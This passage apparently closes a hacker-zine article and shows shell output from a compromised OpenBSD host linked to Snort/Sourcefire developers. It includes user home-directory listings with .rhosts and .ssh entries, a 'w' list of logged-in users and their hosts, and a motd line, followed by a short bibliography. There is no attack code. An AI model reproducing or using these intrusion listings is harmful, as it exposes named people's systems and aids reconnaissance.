-rw-r--r--   1 jed   jed      512000 --- -- ---- unifiedServer.tar

jpavlick:
total 50
drwxr-xr-x   3 jpavlick  jpavlick    512 --- -- ---- .
drwxr-xr-x  15 root      wheel       512 --- -- ---- ..
-rw-r--r--   1 jpavlick  jpavlick    769 --- -- ---- .cshrc
-rw-------   1 jpavlick  jpavlick   2572 --- -- ---- .history
-rw-r--r--   1 jpavlick  jpavlick    318 --- -- ---- .login
-rw-r--r--   1 jpavlick  jpavlick    105 --- -- ---- .mailrc
-rw-r--r--   1 jpavlick  jpavlick    201 --- -- ---- .profile
-rw-------   1 jpavlick  jpavlick    128 --- -- ---- .rhosts
drwx------   2 jpavlick  jpavlick    512 --- -- ---- .ssh
-rw-r--r--   1 jpavlick  jpavlick  13735 --- -- ---- index.htm
-rw-r--r--   1 root      jpavlick      0 --- -- ---- me

mikef:
total 14
drwxr-xr-x   2 mikef  mikef  512 --- -- ---- .
drwxr-xr-x  15 root   wheel  512 --- -- ---- ..
-rw-r--r--   1 mikef  mikef  769 --- -- ---- .cshrc
-rw-r--r--   1 mikef  mikef  318 --- -- ---- .login
-rw-r--r--   1 mikef  mikef  105 --- -- ---- .mailrc
-rw-r--r--   1 mikef  mikef  201 --- -- ---- .profile
-rw-------   1 mikef  mikef  128 --- -- ---- .rhosts

phil:
total 14
drwxr-xr-x   2 phil  phil   512 --- -- ---- .
drwxr-xr-x  15 root  wheel  512 --- -- ---- ..
-rw-r--r--   1 phil  phil   621 --- -- ---- .cshrc
-rw-r--r--   1 phil  phil   318 --- -- ---- .login
-rw-r--r--   1 phil  phil   105 --- -- ---- .mailrc
-rw-r--r--   1 phil  phil   201 --- -- ---- .profile
-rw-------   1 phil  phil   128 --- -- ---- .rhosts

roesch:
total 393860
drwxr-xr-x   8 roesch  roesch      1024 --- -- ---- .
drwxr-xr-x  15 root    wheel        512 --- -- ---- ..
drwx------   3 roesch  roesch       512 --- -- ---- .BitchX
-rw-r--r--   1 roesch  roesch       621 --- -- ---- .cshrc
-rw-------   1 roesch  roesch      2452 --- -- ---- .history
-rw-r--r--   1 roesch  roesch       318 --- -- ---- .login
-rw-r--r--   1 roesch  roesch       105 --- -- ---- .mailrc
-rw-r--r--   1 roesch  roesch       201 --- -- ---- .profile
-rw-------   1 roesch  roesch       128 --- -- ---- .rhosts
drwx------   2 roesch  roesch       512 --- -- ---- .ssh
drwxr-xr-x   6 roesch  roesch       512 --- -- ---- 3.1
-rw-r--r--   1 roesch  roesch        49 --- -- ---- README
-rw-r--r--   1 roesch  roesch     84470 --- -- ---- TR94-17.ps
-r-xr-xr-x   1 dr      dr      89395561 --- -- ---- csv11full.exe
-rw-r--r--   1 roesch  roesch     19056 --- -- ---- gpgstuff.tgz
-r-xr-xr-x   1 dr      dr      69335386 --- -- ---- hl1107.exe
-rw-r-----   1 roesch  roesch  30892631 --- -- ---- honeynet.tar.gz
-rw-r--r--   1 roesch  roesch     13441 --- -- ---- index.htm
-rw-r--r--   1 roesch  roesch       806 --- -- ---- index.html
-rw-r--r--   1 roesch  roesch    133029 --- -- ---- libprelude-latest.tar.gz
-rw-r--r--   1 roesch  roesch   1179507 --- -- ---- new_pdf_files.zip
-rw-r--r--   1 roesch  roesch     10885 --- -- ---- news_update 3_1_02.zip
drwxr-xr-x   7 roesch  roesch      2048 --- -- ---- nmap-2.54BETA34
-rw-r--r--   1 roesch  roesch    861995 --- -- ---- nmap-2.54BETA34.tgz
-rw-r--r--   1 roesch  roesch    398595 --- -- ---- openssh-3.4.tgz
-rw-r--r--   1 roesch  roesch       605 --- -- ---- out
-rw-r--r--   1 roesch  roesch      3119 --- -- ---- pr3.htm
-rw-r--r--   1 roesch  roesch    424844 --- -- ---- prelude-nids-latest.tar.gz
-rw-r--r--   1 roesch  roesch      3837 --- -- ---- revised_console_index.ZIP
-rw-r--r--   1 roesch  roesch      5844 --- -- ---- revised_screens.zip
-rw-r--r--   1 roesch  roesch   3036128 --- -- ---- sf_website.zip
-rw-r--r--   1 roesch  roesch      5681 --- -- ---- sflogo2.gif
drwxr-xr-x  11 roesch  roesch      1024 --- -- ---- snort
-rw-r--r--   1 roesch  roesch   1714632 --- -- ---- snort-1.8.4-beta4.tar.gz
-rw-r--r--   1 roesch  roesch   1731645 --- -- ---- snort-1.8.4-beta5.tar.gz
-rw-r--r--   1 roesch  roesch   1766532 --- -- ---- snort-1.8.4.tar.gz
-rw-r--r--   1 roesch  roesch    350535 --- -- ---- snort-1.8.4.tgz
drwxr-xr-x  15 roesch  roesch      4096 --- -- ---- ssh

sfuser1:
total 26
drwxr-xr-x   3 sfuser1  sfuser1  1536 --- -- ---- .
drwxr-xr-x  15 root     wheel     512 --- -- ---- ..
-rw-r--r--   1 sfuser1  sfuser1   769 --- -- ---- .cshrc
-rw-r--r--   1 sfuser1  sfuser1   318 --- -- ---- .login
-rw-r--r--   1 sfuser1  sfuser1   105 --- -- ---- .mailrc
-rw-r--r--   1 sfuser1  sfuser1   201 --- -- ---- .profile
-rw-------   1 sfuser1  sfuser1   128 --- -- ---- .rhosts
-rw-r--r--   1 sfuser1  sfuser1  3034 --- -- ---- logs.out
drwxr-xr-x   2 sfuser1  sfuser1  1536 --- -- ---- veridian

sschwing:
total 14
drwxr-xr-x   2 sschwing  sschwing  512 --- -- ---- .
drwxr-xr-x  15 root      wheel     512 --- -- ---- ..
-rw-r--r--   1 sschwing  sschwing  769 --- -- ---- .cshrc
-rw-r--r--   1 sschwing  sschwing  318 --- -- ---- .login
-rw-r--r--   1 sschwing  sschwing  105 --- -- ---- .mailrc
-rw-r--r--   1 sschwing  sschwing  201 --- -- ---- .profile
-rw-------   1 sschwing  sschwing  128 --- -- ---- .rhosts

tburgess:
total 3040
drwxr-xr-x   4 tburgess  tburgess      512 --- -- ---- .
drwxr-xr-x  15 root      wheel         512 --- -- ---- ..
-rw-r--r--   1 tburgess  tburgess      769 --- -- ---- .cshrc
-rw-------   1 tburgess  tburgess     2265 --- -- ---- .history
-rw-r--r--   1 tburgess  tburgess      318 --- -- ---- .login
-rw-r--r--   1 tburgess  tburgess      105 --- -- ---- .mailrc
-rw-r--r--   1 tburgess  tburgess      201 --- -- ---- .profile
-rw-------   1 tburgess  tburgess      128 --- -- ---- .rhosts
drwx------   2 tburgess  tburgess      512 --- -- ---- .ssh
-rw-r--r--   1 tburgess  tburgess  1525673 --- -- ---- ossh-comp29-33.tgz
drwxr-xr-x  15 tburgess  tburgess     4608 --- -- ---- ssh

w;
--:---M  up --- days,  -:--, 12 users, load averages: 0.29, 0.19, 0.12
USER    TTY FROM              LOGIN@  IDLE WHAT
cmg      p0 snorty-ext:S.3   -------  -:-- -usr/local/bin/tcsh
cmg      p1 snorty-ext:S.0   -------     - epic irc.secsup.uu.net
bmc      p2 sdsl-64-32-241-7 -------     - BitchX cazz irc.secsup.uu.net
cmg      p3 snorty-ext:S.4   ---------days -sh
cmg      p4 snorty-ext:S.2   ---------days ssh ns1
cmg      p5 snorty-ext:S.6   -------  -:-- -usr/local/bin/tcsh
bmc      p6 sdsl-64-32-241-7 -------     - BitchX cazz irc.openprojects.net
bmc      p7 sdsl-64-32-241-7 -------     - BitchX cazz irc.shmoo.com
cmg      p9 snorty-ext:S.7   -------  -:-- -usr/local/bin/tcsh
cmg      pb snorty-ext:S.1   ------- -days ssh www.sourcefire.com
cmg      pd snorty-ext:S.5   ------- -days ssh mail
cmg      q2 snorty-ext:S.8   -------  -:-- -usr/local/bin/tcsh
cat /etc/motd
OpenBSD 2.9 (FW) #0: Fri --- -- ----:-- EDT ----




[=-- Bibliography --=]

1. About Snort - [http://www.snort.org/about.html]

2. Honeynet Related Research Projects -
   [http://www.honeynet.org/research/index.html]

3. Snort Rules Database - [http://www.snort.org/snort-db/]




|=[ EOF ]=---------------------------------------------------------------=|